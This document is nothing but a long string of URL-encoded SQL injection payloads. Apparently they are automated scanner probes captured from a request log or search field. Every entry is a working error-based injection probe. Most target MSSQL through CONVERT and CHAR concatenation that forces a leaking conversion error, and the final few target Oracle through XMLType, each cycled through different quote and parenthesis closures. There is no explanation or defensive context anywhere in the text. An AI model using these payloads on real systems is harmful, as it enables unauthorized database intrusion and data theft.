-5415%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -6576%27%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -6415%27%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -9026%22%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -6009%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%285729%3D5729 -5577%29%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%285639%3D5639 -5975%29%29%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%281777%3D1777 -1099%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -5266%27%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%27yawA%27%3D%27yawA -6255%27%29%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27blaf%27%3D%27blaf -4263%27%29%29%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27UZOL%27%3D%27UZOL -7379%27%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%27dRWv%27%3D%27dRWv -5264%27%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%27wxgf%27%20LIKE%20%27wxgf -3587%27%29%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27xQOP%27%20LIKE%20%27xQOP -7028%27%29%29%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27SjyH%27%20LIKE%20%27SjyH -1820%27%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%27pZeI%27%20LIKE%20%27pZeI -9155%22%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%22XqiA%22%3D%22XqiA -8459%22%29%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22mZlo%22%3D%22mZlo -6934%22%29%29%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22MWmX%22%3D%22MWmX -6272%22%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%22EItc%22%3D%22EItc -3102%22%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%22GIPc%22%20LIKE%20%22GIPc -6308%22%29%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22AKSg%22%20LIKE%20%22AKSg -4274%22%29%29%29%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22MAbp%22%20LIKE%20%22MAbp -7992%22%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%22vrkv%22%20LIKE%20%22vrkv -3793%29%20WHERE%209674%3D9674%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -5812%27%29%20WHERE%202522%3D2522%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -8121%27%20WHERE%204509%3D4509%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -4607%22%20WHERE%201185%3D1185%20OR%204615%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284615%3D4615%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -3289%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -5215%27%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -3163%27%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -8047%22%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -6985%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%287923%3D7923 -3593%29%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%286779%3D6779 -5925%29%29%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%284596%3D4596 -7843%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -1259%27%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%27bJfV%27%3D%27bJfV -4405%27%29%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27WNoR%27%3D%27WNoR -9908%27%29%29%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27Myau%27%3D%27Myau -1873%27%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%27wYef%27%3D%27wYef -3575%27%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%27TLzE%27%20LIKE%20%27TLzE -7405%27%29%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27fofM%27%20LIKE%20%27fofM -7366%27%29%29%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27eepX%27%20LIKE%20%27eepX -4052%27%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%27DfwM%27%20LIKE%20%27DfwM -9771%22%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%22YhYE%22%3D%22YhYE -3787%22%29%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22zbzr%22%3D%22zbzr -2662%22%29%29%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22OFOY%22%3D%22OFOY -1247%22%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%22PruD%22%3D%22PruD -9597%22%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%22oyas%22%20LIKE%20%22oyas -2580%22%29%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22kMyn%22%20LIKE%20%22kMyn -7305%22%29%29%29%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22hOvW%22%20LIKE%20%22hOvW -8654%22%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%22ZMou%22%20LIKE%20%22ZMou -2222%29%20WHERE%206417%3D6417%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -2575%27%29%20WHERE%203293%3D3293%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -7000%27%20WHERE%209271%3D9271%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -3026%22%20WHERE%204339%3D4339%20OR%201384%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281384%3D1384%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 -4236%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -8826%27%29%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -3977%27%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 -4266%22%20OR%206433%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286433%3D6433%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 